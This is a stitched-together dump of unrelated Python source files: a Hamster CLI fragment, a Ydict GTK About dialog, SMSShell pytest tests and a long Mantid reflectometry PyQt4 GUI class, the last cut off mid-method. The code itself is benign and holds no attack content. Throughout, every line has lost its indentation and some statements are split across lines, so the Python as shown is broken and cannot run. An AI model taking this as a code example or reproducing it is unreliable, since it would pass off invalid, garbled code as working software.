assert id_ > 0, "failed to add fact"
sys.exit(0)
else:
app.register()
if action == "edit":
assert len(args.action_args) == 1, (
"edit requires exactly one argument, got {}"
.format(args.action_args))
id_ = int(args.action_args[0])
assert id_ > 0, "received non-positive id : {}".format(id_)
action_data = glib.Variant.new_int32(id_)
else:
action_data = None
app.activate_action(action, action_data)
run_args = [sys.argv[0]] + unknown_args
logger.debug("run {}".format(run_args))
status = app.run(run_args)
logger.debug("app exited")
sys.exit(status)
elif hasattr(hamster_client, action):
getattr(hamster_client, action)(*args.action_args)
else:
sys.exit(usage % {'prog': sys.argv[0]})
|
from gi.repository import Gtk
from .i18n import _
class AboutDialog(Gtk.AboutDialog):
def __init__(self, parent):
super(AboutDialog, self).__init__(title=_('About'), parent=parent)
self.set_modal(True)
self.set_program_name('Ydict')
self.set_authors(['Wiky L<wiiiky@outlook.com>'])
self.set_artists(['Wiky L<wiiiky@outlook.com>'])
self.set_comments('')
self.set_copyright('Copyright (c) Wiky L 2015')
self.set_license_type(Gtk.License.GPL_3_0)
self.set_logo_icon_name('ydict')
self.set_version('1.0')
self.set_website('https://github.com/wiiiky/ydict')
self.set_website_label('GitHub')
self.set_wrap_license(True)
|
from ._costs import *
|
import argparse
import logging
import pytest
import SMSShell
import SMSShell.commands
def test_abstract_init():
"""Test abstract init methods
"""
abs = SMSShell.commands.AbstractCommand(logging.getLogger(),
object(),
object(),
object())
assert abs.name == 'abstractcommand'
def test_abstract_not_implemented():
abs = SMSShell.commands.AbstractCommand(logging.getLogger(),
object(),
object(),
object())
with pytest.raises(SMSShell.commands.CommandBadImplemented):
abs.description([])
with pytest.raises(SMSShell.commands.CommandBadImplemented):
abs.usage([])
with pytest.raises(SMSShell.commands.CommandBadImplemented):
abs.main([])
def test_abstract_bad_input_state_type():
class Bad(SMSShell.commands.AbstractCommand):
def inputStates(self):
return dict()
com = Bad(logging.getLogger(),
object(),
object(),
object())
with pytest.raises(SMSShell.commands.CommandBadImplemented):
com._inputStates()
def test_abstract_bad_input_state_value():
class Bad(SMSShell.commands.AbstractCommand):
def inputStates(self):
return ['d']
com = Bad(logging.getLogger(),
object(),
object(),
object())
with pytest.raises(SMSShell.commands.CommandBadImplemented):
com._inputStates()
def test_abstract_bad_arg_parser_type():
class Bad(SMSShell.commands.AbstractCommand):
def argsParser(self):
return 'a'
com = Bad(logging.getLogger(),
object(),
object(),
object())
with pytest.raises(SMSShell.commands.CommandBadImplemented):
com._argsParser()
def test_abstract_bad_arg_parser_init():
class Bad(SMSShell.commands.AbstractCommand):
def argsParser(self):
raise ValueError('no')
com = Bad(logging.getLogger(),
object(),
object(),
object())
with pytest.raises(SMSShell.commands.CommandBadImplemented):
com._argsParser()
|
from __future__ import (absolute_import, division, print_function)
try:
from mantidplot import *
except ImportError:
canMantidPlot = False #
import csv
import os
import re
from operator import itemgetter
import itertools
from PyQt4 import QtCore, QtGui
from mantid.simpleapi import *
from isis_reflectometry.quick import *
from isis_reflectometry.convert_to_wavelength import ConvertToWavelength
from isis_reflectometry import load_live_runs
from isis_reflectometry.combineMulti import *
import mantidqtpython
from mantid.api import Workspace, WorkspaceGroup, CatalogManager, AlgorithmManager
from mantid import UsageService
from ui.reflectometer.ui_refl_window import Ui_windowRefl
from ui.reflectometer.refl_save import Ui_SaveWindow
from ui.reflectometer.refl_choose_col import ReflChoose
from ui.reflectometer.refl_options import ReflOptions
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
canMantidPlot = True
class ReflGui(QtGui.QMainWindow, Ui_windowRefl):
current_instrument = None
current_table = None
current_polarisation_method = None
labelStatus = None
accMethod = None
def __init__(self):
"""
Initialise the interface
"""
super(QtGui.QMainWindow, self).__init__()
self.setupUi(self)
self.loading = False
self.clip = QtGui.QApplication.clipboard()
self.shown_cols = {}
self.mod_flag = False
self.run_cols = [0, 5, 10]
self.angle_cols = [1, 6, 11]
self.scale_col = 16
self.stitch_col = 17
self.plot_col = 18
self.__graphs = dict()
self._last_trans = ""
self.icat_file_map = None
self.__instrumentRuns = None
self.__icat_download = False
self.__group_tof_workspaces = True
# Q Settings
self.__generic_settings = "Mantid/ISISReflGui"
self.__live_data_settings = "Mantid/ISISReflGui/LiveData"
self.__search_settings = "Mantid/ISISReflGui/Search"
self.__column_settings = "Mantid/ISISReflGui/Columns"
self.__icat_download_key = "icat_download"
self.__ads_use_key = "AlgUse"
self.__alg_migration_key = "AlgUseReset"
self.__live_data_frequency_key = "frequency"
self.__live_data_method_key = "method"
self.__group_tof_workspaces_key = "group_tof_workspaces"
self.__stitch_right_key = "stitch_right"
# Setup instrument with defaults assigned.
self.instrument_list = ['INTER', 'SURF', 'CRISP', 'POLREF', 'OFFSPEC']
self.polarisation_instruments = ['CRISP', 'POLREF']
self.polarisation_options = {'None': PolarisationCorrection.NONE,
'1-PNR': PolarisationCorrection.PNR,
'2-PA': PolarisationCorrection.PA}
# Set the live data settings, use default if none have been set before
settings = QtCore.QSettings()
settings.beginGroup(self.__live_data_settings)
self.live_method = settings.value(self.__live_data_method_key, "", type=str)
self.live_freq = settings.value(self.__live_data_frequency_key, 0, type=float)
if not self.live_freq:
logger.information(
"No settings were found for Update frequency of loading live data, Loading default of 60 seconds")
self.live_freq = float(60)
settings.setValue(self.__live_data_frequency_key, self.live_freq)
if not self.live_method:
logger.information(
"No settings were found for Accumulation Method of loading live data, Loading default of \"Add\"")
self.live_method = "Add"
settings.setValue(self.__live_data_method_key, self.live_method)
settings.endGroup()
settings.beginGroup(self.__generic_settings)
self.__alg_migrate = settings.value(self.__alg_migration_key, True, type=bool)
if self.__alg_migrate:
self.__alg_use = True # We will use the algorithms by default rather than the quick scripts
self.__alg_migrate = False # Never do this again. We only want to reset once.
else:
self.__alg_use = settings.value(self.__ads_use_key, True, type=bool)
self.__icat_download = settings.value(self.__icat_download_key, False, type=bool)
self.__group_tof_workspaces = settings.value(self.__group_tof_workspaces_key, True, type=bool)
self.__scale_right = settings.value(self.__stitch_right_key, True, type=bool)
settings.setValue(self.__ads_use_key, self.__alg_use)
settings.setValue(self.__icat_download_key, self.__icat_download)
settings.setValue(self.__group_tof_workspaces_key, self.__group_tof_workspaces)
settings.setValue(self.__alg_migration_key, self.__alg_migrate)
settings.setValue(self.__stitch_right_key, self.__scale_right)
settings.endGroup()
del settings
# register startup
UsageService.registerFeatureUsage("Interface", "ISIS Reflectomety", False)
def __del__(self):
"""
Save the contents of the table if the modified flag was still set
"""
if self.mod_flag:
self._save(true)
def _save_check(self):
"""
Show a custom message box asking if the user wants to save, or discard their changes or cancel back to the interface
"""
msgBox = QtGui.QMessageBox()
msgBox.setText("The table has been modified. Do you want to save your changes?")
accept_btn = QtGui.QPushButton('Save')
cancel_btn = QtGui.QPushButton('Cancel')
discard_btn = QtGui.QPushButton('Discard')
msgBox.addButton(accept_btn, QtGui.QMessageBox.AcceptRole)
msgBox.addButton(cancel_btn, QtGui.QMessageBox.RejectRole)
msgBox.addButton(discard_btn, QtGui.QMessageBox.NoRole)
msgBox.setIcon(QtGui.QMessageBox.Question)
msgBox.setDefaultButton(accept_btn)
msgBox.setEscapeButton(cancel_btn)
msgBox.exec_()
btn = msgBox.clickedButton()
saved = None
if btn.text() == accept_btn.text():
ret = QtGui.QMessageBox.AcceptRole
saved = self._save()
elif btn.text() == cancel_btn.text():
ret = QtGui.QMessageBox.RejectRole
else:
ret = QtGui.QMessageBox.NoRole
return ret, saved
def closeEvent(self, event):
"""
Close the window. but check if the user wants to save
"""
self.buttonProcess.setFocus()
if self.mod_flag:
event.ignore()
ret, saved = self._save_check()
if ret == QtGui.QMessageBox.AcceptRole:
if saved:
self.mod_flag = False
event.accept()
elif ret == QtGui.QMessageBox.RejectRole:
event.ignore()
elif ret == QtGui.QMessageBox.NoRole:
self.mod_flag = False
event.accept()
def _instrument_selected(self, instrument):
"""
Change the default instrument to the selected one
"""
config['default.instrument'] = self.instrument_list[instrument]
logger.notice("Instrument is now: " + str(config['default.instrument']))
self.textRB.clear()
self._populate_runs_list()
self.current_instrument = self.instrument_list[instrument]
self.comboPolarCorrect.setEnabled(
self.current_instrument in self.polarisation_instruments) # Enable as appropriate
self.comboPolarCorrect.setCurrentIndex(self.comboPolarCorrect.findText('None')) # Reset to None
def _table_modified(self, row, column):
"""
sets the modified flag when the table is altered
"""
# Sometimes users enter leading or trailing whitespace into a cell.
# Let's remove it for them automatically.
item = self.tableMain.item(row, column)
item.setData(0, str.strip(str(item.data(0))))
if not self.loading:
self.mod_flag = True
plotbutton = self.tableMain.cellWidget(row, self.plot_col).children()[1]
self.__reset_plot_button(plotbutton)
def _plot_row(self):
"""
handler for the plot buttons
"""
plotbutton = self.sender()
self._plot(plotbutton)
def _show_slit_calculator(self):
calc = mantidqtpython.MantidQt.MantidWidgets.SlitCalculator(self)
calc.setCurrentInstrumentName(self.current_instrument)
calc.processInstrumentHasBeenChanged()
calc.exec_()
def _polar_corr_selected(self):
"""
Event handler for polarisation correction selection.
"""
if self.current_instrument in self.polarisation_instruments:
chosen_method = self.comboPolarCorrect.currentText()
self.current_polarisation_method = self.polarisation_options[chosen_method]
else:
logger.notice("Polarisation correction is not supported on " + str(self.current_instrument))
def setup_layout(self):
"""
Do further setup layout that couldn't be done in the designer
"""
self.comboInstrument.addItems(self.instrument_list)
current_instrument = config['default.instrument'].upper()
if current_instrument in self.instrument_list:
self.comboInstrument.setCurrentIndex(self.instrument_list.index(current_instrument))
else:
self.comboInstrument.setCurrentIndex(0)
config['default.instrument'] = 'INTER'
self.current_instrument = config['default.instrument'].upper()
# Setup polarisation options with default assigned
self.comboPolarCorrect.clear()
self.comboPolarCorrect.addItems(list(self.polarisation_options.keys()))
self.comboPolarCorrect.setCurrentIndex(self.comboPolarCorrect.findText('None'))
self.current_polarisation_method = self.polarisation_options['None']
self.comboPolarCorrect.setEnabled(self.current_instrument in self.polarisation_instruments)
self.splitterList.setSizes([200, 800])
self.labelStatus = QtGui.QLabel("Ready")
self.statusMain.addWidget(self.labelStatus)
self._initialise_table()
self._populate_runs_list()
self._connect_slots()
return True
def _reset_table(self):
"""
Reset the plot buttons and stitch checkboxes back to thier defualt state
"""
# switches from current to true, to false to make sure stateChanged fires
self.checkTickAll.setCheckState(2)
self.checkTickAll.setCheckState(0)
for row in range(self.tableMain.rowCount()):
plotbutton = self.tableMain.cellWidget(row, self.plot_col).children()[1]
self.__reset_plot_button(plotbutton)
def __reset_plot_button(self, plotbutton):
"""
Reset the provided plot button to ti's default state: disabled and with no cache
"""
plotbutton.setDisabled(True)
plotbutton.setProperty('runno', None)
plotbutton.setProperty('overlapLow', None)
plotbutton.setProperty('overlapHigh', None)
plotbutton.setProperty('wksp', None)
def _initialise_table(self):
"""
Initialise the table. Clearing all data and adding the checkboxes and plot buttons
"""
# first check if the table has been changed before clearing it
if self.mod_flag:
ret, _saved = self._save_check()
if ret == QtGui.QMessageBox.RejectRole:
return
self.current_table = None
settings = QtCore.QSettings()
settings.beginGroup(self.__column_settings)
for column in range(self.tableMain.columnCount()):
for row in range(self.tableMain.rowCount()):
if column in self.run_cols:
item = QtGui.QTableWidgetItem()
item.setText('')
item.setToolTip('Runs can be colon delimited to coadd them')
self.tableMain.setItem(row, column, item)
elif column in self.angle_cols:
item = QtGui.QTableWidgetItem()
item.setText('')
item.setToolTip('Angles are in degrees')
self.tableMain.setItem(row, column, item)
elif column == self.stitch_col:
check = QtGui.QCheckBox()
check.setCheckState(False)
check.setToolTip('If checked, the runs in this row will be stitched together')
item = QtGui.QWidget()
layout = QtGui.QHBoxLayout(item)
layout.addWidget(check)
layout.setAlignment(QtCore.Qt.AlignCenter)
layout.setSpacing(0)
layout.setContentsMargins(0, 0, 0, 0)
item.setLayout(layout)
item.setContentsMargins(0, 0, 0, 0)
self.tableMain.setCellWidget(row, self.stitch_col, item)
elif column == self.plot_col:
button = QtGui.QPushButton('Plot')
button.setProperty("row", row)
self.__reset_plot_button(button)
button.setToolTip('Plot the workspaces produced by processing this row.')
button.clicked.connect(self._plot_row)
item = QtGui.QWidget()
layout = QtGui.QHBoxLayout(item)
layout.addWidget(button)
layout.setAlignment(QtCore.Qt.AlignCenter)
layout.setSpacing(0)
layout.setContentsMargins(0, 0, 0, 0)
item.setLayout(layout)
item.setContentsMargins(0, 0, 0, 0)
self.tableMain.setCellWidget(row, self.plot_col, item)
else:
item = QtGui.QTableWidgetItem()
item.setText('')
self.tableMain.setItem(row, column, item)
vis_state = settings.value(str(column), True, type=bool)
self.shown_cols[column] = vis_state
if vis_state:
self.tableMain.showColumn(column)
else:
self.tableMain.hideColumn(column)
settings.endGroup()
del settings
self.tableMain.resizeColumnsToContents()
self.mod_flag = False
def _connect_slots(self):
"""
Connect the signals to the corresponding methods
"""
self.checkTickAll.stateChanged.connect(self._set_all_stitch)
self.comboInstrument.activated[int].connect(self._instrument_selected)
self.comboPolarCorrect.activated.connect(self._polar_corr_selected)
self.textRB.returnPressed.connect(self._populate_runs_list)
self.buttonAuto.clicked.connect(self._autofill)
self.buttonSearch.clicked.connect(self._populate_runs_list)
self.buttonClear.clicked.connect(self._initialise_table)
self.buttonProcess.clicked.connect(self._process)
self.buttonTransfer.clicked.connect(self._transfer)
self.buttonColumns.clicked.connect(self._choose_columns)
self.actionOpen_Table.triggered.connect(self._load_table)
self.actionReload_from_Disk.triggered.connect(self._reload_table)
self.actionSave.triggered.connect(self._save)
self.actionSave_As.triggered.connect(self._save_as)
self.actionSave_Workspaces.triggered.connect(self._save_workspaces)
self.actionClose_Refl_Gui.triggered.connect(self.close)
self.actionMantid_Help.triggered.connect(self._show_help)
self.actionAutofill.triggered.connect(self._autofill)
self.actionSearch_RB.triggered.connect(self._populate_runs_list)
self.actionClear_Table.triggered.connect(self._initialise_table)
self.actionProcess.triggered.connect(self._process)
self.actionTransfer.triggered.connect(self._transfer)
self.tableMain.cellChanged.connect(self._table_modified)
self.actionClear.triggered.connect(self._clear_cells)
self.actionPaste.triggered.connect(self._paste_cells)
self.actionCut.triggered.connect(self._cut_cells)
self.actionCopy.triggered.connect(self._copy_cells)
self.actionChoose_Columns.triggered.connect(self._choose_columns)
self.actionRefl_Gui_Options.triggered.connect(self._options_dialog)
self.actionSlit_Calculator.triggered.connect(self._show_slit_calculator)
def __valid_rb(self):
# Ensure that you cannot put zero in for an rb search
rbSearchValidator = QtGui.QIntValidator(self)
current_text = self.textRB.text()
rbSearchValidator.setBottom(1)
state = rbSearchValidator.validate(current_text, 0)[0]
if state == QtGui.QValidator.Acceptable:
return True
else:
self.textRB.clear()
if current_text:
logger.warning("RB search restricted to numbers > 0")
return False
def _populate_runs_list(self):
"""
Populate the list at the right with names of runs and workspaces from the archives
"""
# Clear existing
self.listMain.clear()
if self.__valid_rb():
# Use ICAT for a journal search based on the RB number
active_session_id = None
if CatalogManager.numberActiveSessions() == 0:
# Execute the CatalogLoginDialog
login_alg = CatalogLoginDialog()
session_object = login_alg.getProperty("KeepAlive").value
active_session_id = session_object.getPropertyValue("Session")
# Fetch out an existing session id
active_session_id = CatalogManager.getActiveSessions()[-1].getSessionId()
# This might be another catalog session, but at present there is no way to tell.
search_alg = AlgorithmManager.create('CatalogGetDataFiles')
search_alg.initialize()
search_alg.setChild(True) # Keeps the results table out of the ADS
search_alg.setProperty('InvestigationId', str(self.textRB.text()))
search_alg.setProperty('Session', active_session_id)
search_alg.setPropertyValue('OutputWorkspace', '_dummy')
search_alg.execute()
search_results = search_alg.getProperty('OutputWorkspace').value
self.icat_file_map = {}
self.statusMain.clearMessage()
for row in search_results:
file_name = row['Name']
file_id = row['Id']
description = row['Description']
run_number = re.search(r'[1-9]\d+', file_name).group()
if bool(re.search('(raw)$', file_name, re.IGNORECASE)): # Filter to only display and map raw files.
title = (run_number + ': ' + description).strip()
self.icat_file_map[title] = (file_id, run_number, file_name)
self.listMain.addItem(title)
self.listMain.sortItems()
del search_results
def _autofill(self):
"""
copy the contents of the selected cells to the row below as long as the row below contains a run number in the first cell
"""
# make sure all selected cells are in the same row
sum = 0
howMany = len(self.tableMain.selectedItems())
for cell in self.tableMain.selectedItems():
sum = sum + self.tableMain.row(cell)
if howMany:
selectedrow = self.tableMain.row(self.tableMain.selectedItems()[0])
if sum / howMany == selectedrow:
startrow = selectedrow + 1
filled = 0
for cell in self.tableMain.selectedItems():
row = startrow
txt = cell.text()
while self.tableMain.item(row, 0).text() != '':
item = QtGui.QTableWidgetItem()
item.setText(txt)
self.tableMain.setItem(row, self.tableMain.column(cell), item)
row = row + 1
filled = filled + 1
if not filled:
QtGui.QMessageBox.critical(self.tableMain,
'Cannot perform Autofill',
"No target cells to autofill. Rows to be filled should contain a run number in their "
"first cell, and start from directly below the selected line.")
else:
QtGui.QMessageBox.critical(self.tableMain, 'Cannot perform Autofill',
"Selected cells must all be in the same row.")
else:
QtGui.QMessageBox.critical(self.tableMain, 'Cannot perform Autofill', "There are no source cells selected.")
def _clear_cells(self):
"""
Clear the selected area of data
"""
cells = self.tableMain.selectedItems()
for cell in cells:
column = cell.column()
if column < self.stitch_col:
cell.setText('')
def _cut_cells(self):
"""
copy the selected cells then clear the area
"""
self._copy_cells()
self._clear_cells()
def _copy_cells(self):
"""
Copy the selected ranage of cells to the clipboard
"""
cells = self.tableMain.selectedItems()
if not cells:
print
'nothing to copy'
return
# first discover the size of the selection and initialise a list
mincol = cells[0].column()
if mincol > self.scale_col:
logger.error("Cannot copy, all cells out of range")
return
maxrow = -1
maxcol = -1
minrow = cells[0].row()
for cell in reversed(range(len(cells))):
col = cells[cell].column()
if col < self.stitch_col:
maxcol = col
maxrow = cells[cell].row()
break
colsize = maxcol - mincol + 1
rowsize = maxrow - minrow + 1
selection = [['' for x in range(colsize)] for y in range(rowsize)]
# now fill that list
for cell in cells:
row = cell.row()
col = cell.column()
if col < self.stitch_col:
selection[row - minrow][col - mincol] = str(cell.text())
tocopy = ''
for y in range(rowsize):
for x in range(colsize):
if x > 0:
tocopy += '\t'
tocopy += selection[y][x]
if y < (rowsize - 1):
tocopy += '\n'
self.clip.setText(str(tocopy))
def _paste_cells(self):
"""
Paste the contents of the clipboard to the table at the selected position
"""
pastedtext = self.clip.text()
if not pastedtext:
logger.warning("Nothing to Paste")
return
selected = self.tableMain.selectedItems()
if not selected:
logger.warning("Cannot paste, no editable cells selected")
return
pasted = pastedtext.splitlines()
pastedcells = []
for row in pasted:
pastedcells.append(row.split('\t'))
pastedcols = len(pastedcells[0])
pastedrows = len(pastedcells)
if len(selected) > 1:
# discover the size of the selection
mincol = selected[0].column()
if mincol > self.scale_col:
logger.error("Cannot copy, all cells out of range")
return
minrow = selected[0].row()
# now fill that list
for cell in selected:
row = cell.row()
col = cell.column()
if col < self.stitch_col and (col - mincol) < pastedcols and (row - minrow) < pastedrows and len(
pastedcells[row - minrow]):
cell.setText(pastedcells[row - minrow][col - mincol])
elif selected:
# when only a single cell is selected, paste all the copied item up until the table limits
cell = selected[0]
currow = cell.row()
homecol = cell.column()
tablerows = self.tableMain.rowCount()
for row in pastedcells:
if len(row):
curcol = homecol
if currow < tablerows:
for col in row:
if curcol < self.stitch_col:
curcell = self.tableMain.item(currow, curcol)
curcell.setText(col)
curcol += 1
else:
# the row has hit the end of the editable cells
break
currow += 1
else:
# it's dropped off the bottom of the table
break
else:
logger.warning("Cannot paste, no editable cells selected")
def _transfer(self):
"""
Transfer run numbers to the table
"""
tup = ()
for idx in self.listMain.selectedItems():
split_title = re.split(":th=|th=|:|dq/q=", idx.text())
if len(split_title) < 3:
split_title = re.split(":", idx.text())
if len(split_title) < 2:
logger.warning('cannot transfer ' + idx.text() + ' title is not in the right form ')
continue
else:
theta = 0
split_title.append(theta) # Append a dummy theta value.
if len(split_title) < 4:
dqq = 0
split_title.append(dqq) # Append a dummy dq/q value.
tup = tup + (split_title,) # Tuple of lists containing (run number, title, theta, dq/q)
tupsort = sorted(tup, key=itemgetter(1, 2)) # now sorted by title then theta
row = 0
for _key, group in itertools.groupby(tupsort, lambda x: x[1]): # now group by title
col = 0
dqq = 0 # only one value of dqq per row
run_angle_pairs_of_title = list() # for storing run_angle pairs all with the same title
for object in group: # loop over all with equal title
run_no = object[0]
dqq = object[-1]
angle = object[-2]
run_angle_pairs_of_title.append((run_no, angle))
for angle_key, group in itertools.groupby(run_angle_pairs_of_title, lambda x: x[1]):
runnumbers = "+".join(["%s" % pair[0] for pair in group])
# set the runnumber
item = QtGui.QTableWidgetItem()
item.setText(str(runnumbers))
self.tableMain.setItem(row, col, item)
# Set the angle
item = QtGui.QTableWidgetItem()
item.setText(str(angle_key))
self.tableMain.setItem(row, col + 1, item)
# Set the transmission
item = QtGui.QTableWidgetItem()
item.setText(self.textRuns.text())
self.tableMain.setItem(row, col + 2, item)
col = col + 5
if col >= 11:
col = 0
# set dq/q
item = QtGui.QTableWidgetItem()
item.setText(str(dqq))
self.tableMain.setItem(row, 15, item)
row = row + 1
if self.__icat_download:
# If ICAT is being used for download, then files must be downloaded at the same time as they are transferred
contents = str(idx.text()).strip()
file_id, _runnumber, file_name = self.icat_file_map[contents]
active_session_id = CatalogManager.getActiveSessions()[-1].getSessionId()
# This might be another catalog session, but at present there is no way to tell.
save_location = config['defaultsave.directory']
CatalogDownloadDataFiles(file_id, FileNames=file_name, DownloadPath=save_location,
Session=active_session_id)
current_search_dirs = config.getDataSearchDirs()
if save_location not in current_search_dirs:
config.appendDataSearchDir(save_location)
def _set_all_stitch(self, state):
"""
Set the checkboxes in the Stitch? column to the same
"""
for row in range(self.tableMain.rowCount()):
self.tableMain.cellWidget(row, self.stitch_col).children()[1].setCheckState(state)
def __checked_row_stiched(self, row):
return self.tableMain.cellWidget(row, self.stitch_col).children()[1].checkState() > 0
def _process(self):
"""
Process has been pressed, check what has been selected then pass the selection (or whole table) to quick
"""
# --------- If "Process" button pressed, convert raw files to IvsLam and IvsQ and combine if checkbox ticked -------------
_overallQMin = float("inf")
_overallQMax = float("-inf")
try:
willProcess = True
rows = self.tableMain.selectionModel().selectedRows()
rowIndexes = []
for idx in rows:
rowIndexes.append(idx.row())
if not len(rowIndexes):
reply = QtGui.QMessageBox.question(self.tableMain, 'Process all rows?',
"This will process all rows in the table. Continue?",
QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.No:
logger.notice("Cancelled!")
willProcess = False
else:
rowIndexes = range(self.tableMain.rowCount())
if willProcess:
for row in rowIndexes: # range(self.tableMain.rowCount()):
runno = []
wksp = []
overlapLow = []
overlapHigh = []
if self.tableMain.item(row, 0).text() != '':
self.statusMain.showMessage("Processing row: " + str(row + 1))
logger.debug("Processing row: " + str(row + 1))
for i in range(3):
run_entry = str(self.tableMain.item(row, i * 5).text())
if run_entry != '':
runno.append(run_entry)
ovLow = str(self.tableMain.item(row, (i * 5) + 3).text())
if ovLow != '':
overlapLow.append(float(ovLow))
ovHigh = str(self.tableMain.item(row, (i * 5) + 4).text())
if ovHigh != '':
overlapHigh.append(float(ovHigh))
# Determine resolution
if self.tableMain.item(row, 15).text() == '':
loadedRun = None
if load_live_runs.is_live_run(runno[0]):
loadedRun = load_live_runs.get_live_data(config['default.instrument'],
frequency=self.live_freq,
accumulation=self.live_method)
else:
Load(Filename=runno[0], OutputWorkspace="_run")
loadedRun = mtd["_run"]
theta_in_str = str(self.tableMain.item(row, 1).text())
try:
theta_in = None
if len(theta_in_str) > 0:
theta_in = float(theta_in_str)
# Make sure we only ever run calculate resolution on a non-group workspace.
# If we're given a group workspace, we can just run it on the first member of the group instead
thetaRun = loadedRun
if isinstance(thetaRun, WorkspaceGroup):
thetaRun = thetaRun[0]
if not theta_in:
theta_in = getLogValue(thetaRun, "Theta")
dqq = NRCalculateSlitResolution(Workspace=thetaRun, TwoTheta=2*theta_in)
# Put the calculated resolution into the table
resItem = QtGui.QTableWidgetItem()
resItem.setText(str(dqq))
self.tableMain.setItem(row, 15, resItem)
# Update the value for theta_in in the table
ttItem = QtGui.QTableWidgetItem()
ttItem.setText(str(theta_in))
self.tableMain.setItem(row, 1, ttItem)
logger.notice("Calculated resolution: " + str(dqq))
except:
self.statusMain.clearMessage()
logger.error(
"Failed to calculate dq/q because we could not find theta in the workspace's sample log. "
"Try entering theta or dq/q manually.")
return
else:
dqq = float(self.tableMain.item(row, 15).text())
# Check secondary and tertiary theta_in columns, if they're
# blank and their corresponding run columns are set, fill them.
for run_col in [5, 10]:
tht_col = run_col + 1
run_val = str(self.tableMain.item(row, run_col).text())
tht_val = str(self.tableMain.item(row, tht_col).text())
if run_val and not tht_val:
Load(Filename=run_val, OutputWorkspace="_run")
loadedRun = mtd["_run"]
tht_val = getLogValue(loadedRun, "Theta")
if tht_val:
self.tableMain.item(row, tht_col).setText(str(tht_val))
# Populate runlist
first_wq = None
for i in range(0, len(runno)):
theta, qmin, qmax, _wlam, wqBinnedAndScaled, _wqUnBinnedAndUnScaled = \
self._do_run(runno[i], row, i)
if not first_wq:
first_wq = wqBinnedAndScaled # Cache the first Q workspace
theta = round(theta, 3)
qmin = round(qmin, 3)
qmax = round(qmax, 3)
wksp.append(wqBinnedAndScaled.name())
if self.tableMain.item(row, i * 5 + 1).text() == '':
item = QtGui.QTableWidgetItem()
item.setText(str(theta))
self.tableMain.setItem(row, i * 5 + 1, item)
if self.tableMain.item(row, i * 5 + 3).text() == '':
item = QtGui.QTableWidgetItem()
item.setText(str(qmin))
self.tableMain.setItem(row, i * 5 + 3, item)
overlapLow.append(qmin)
if self.tableMain.item(row, i * 5 + 4).text() == '':
item = QtGui.QTableWidgetItem()
item.setText(str(qmax))
self.tableMain.setItem(row, i * 5 + 4, item)
overlapHigh.append(qmax)
if wksp[i].find(',') > 0 or wksp[i].find(':') > 0:
wksp[i] = first_wq.name()
if self.__checked_row_stiched(row):
if len(runno) == 1:
logger.notice("Nothing to combine for processing row : " + str(row))
else:
w1 = getWorkspace(wksp[0])
w2 = getWorkspace(wksp[-1])
if len(runno) == 2:
outputwksp = runno[0] + '_' + runno[1][3:]
else:
outputwksp = runno[0] + '_' + runno[-1][3:]
# get Qmax
if self.tableMain.item(row, i * 5 + 4).text() == '':
overlapHigh = 0.3 * max(w1.readX(0))
Qmin = min(w1.readX(0))
Qmax = max(w2.readX(0))
if len(self.tableMain.item(row, i * 5 + 3).text()) > 0:
Qmin = float(self.tableMain.item(row, i * 5 + 3).text())
if len(self.tableMain.item(row, i * 5 + 4).text()) > 0:
Qmax = float(self.tableMain.item(row, i * 5 + 4).text())
if Qmax > _overallQMax:
_overallQMax = Qmax
if Qmin < _overallQMin:
_overallQMin = Qmin
combineDataMulti(wksp, outputwksp, overlapLow, overlapHigh,
_overallQMin, _overallQMax, -dqq, 1, keep=True,
scale_right=self.__scale_right)
# Enable the plot button
plotbutton = self.tableMain.cellWidget(row, self.plot_col).children()[1]
plotbutton.setProperty('runno', runno)
plotbutton.setProperty('overlapLow', overlapLow)
plotbutton.setProperty('overlapHigh', overlapHigh)
plotbutton.setProperty('wksp', wksp)
plotbutton.setEnabled(True)
self.statusMain.clearMessage()
self.accMethod = None
self.statusMain.clearMessage()
except:
self.statusMain.clearMessage()
raise
def _plot(self, plotbutton):
"""
Plot the row belonging to the selected button
"""
if not isinstance(plotbutton, QtGui.QPushButton):
logger.error("Problem accessing cached data: Wrong data type passed, expected QtGui.QPushbutton")
return
import unicodedata
# make sure the required data can be retrieved properly
try:
runno_u = plotbutton.property('runno')
runno = []
for uni in runno_u:
runno.append(unicodedata.normalize('NFKD', uni).encode('ascii', 'ignore'))
wksp_u = plotbutton.property('wksp')
wksp = []
for uni in wksp_u:
wksp.append(unicodedata.normalize('NFKD', uni).encode('ascii', 'ignore'))
overlapLow = plotbutton.property('overlapLow')
overlapHigh = plotbutton.property('overlapHigh')
row = plotbutton.property('row')
wkspBinned = []
w1 = getWorkspace(wksp[0])
w2 = getWorkspace(wksp[len(wksp) - 1])
dqq = float(self.tableMain.item(row, 15).text())
except:
logger.error("Unable to plot row, required data couldn't be retrieved")
self.__reset_plot_button(plotbutton)
return
for i in range(len(runno)):
if len(overlapLow):
Qmin = overlapLow[0]
else:
Qmin = min(w1.readX(0))
if len(overlapHigh):
Qmax = overlapHigh[len(overlapHigh) - 1]
else:
Qmax = max(w2.readX(0))
ws_name_binned = wksp[i]
wkspBinned.append(ws_name_binned)
wsb = getWorkspace(ws_name_binned)
_Imin = min(wsb.readY(0))
_Imax = max(wsb.readY(0))
if canMantidPlot:
# Get the existing graph if it exists
base_graph = self.__graphs.get(wksp[0], None)
# Clear the window if we're the first of a new set of curves
clearWindow = (i == 0)
# Plot the new curve
base_graph = plotSpectrum(ws_name_binned, 0, True, window=base_graph, clearWindow=clearWindow)
# Save the graph so we can re-use it
self.__graphs[wksp[i]] = base_graph
titl = groupGet(ws_name_binned, 'samp', 'run_title')
if isinstance(titl, str):
base_graph.activeLayer().setTitle(titl)
base_graph.activeLayer().setAxisScale(Layer.Left, _Imin * 0.1, _Imax * 10, Layer.Log10)
base_graph.activeLayer().setAxisScale(Layer.Bottom, Qmin * 0.9, Qmax * 1.1, Layer.Log10)
base_graph.activeLayer().setAutoScale()
# Create and plot stitched outputs
if self.__checked_row_stiched(row):
if len(runno) == 2:
outputwksp = runno[0] + '_' + runno[1][3:]
else:
outputwksp = runno[0] + '_' + runno[2][3:]
if not getWorkspace(outputwksp, report_error=False):
# Stitching has not been done as part of processing, so we need to do it here.
combineDataMulti(wkspBinned, outputwksp, overlapLow, overlapHigh, Qmin, Qmax, -dqq, 1,
keep=True, scale_right=self.__scale_right)
Qmin = min(getWorkspace(outputwksp).readX(0))
Qmax = max(getWorkspace(outputwksp).readX(0))
if canMantidPlot:
stitched_graph = self.__graphs.get(outputwksp, None)
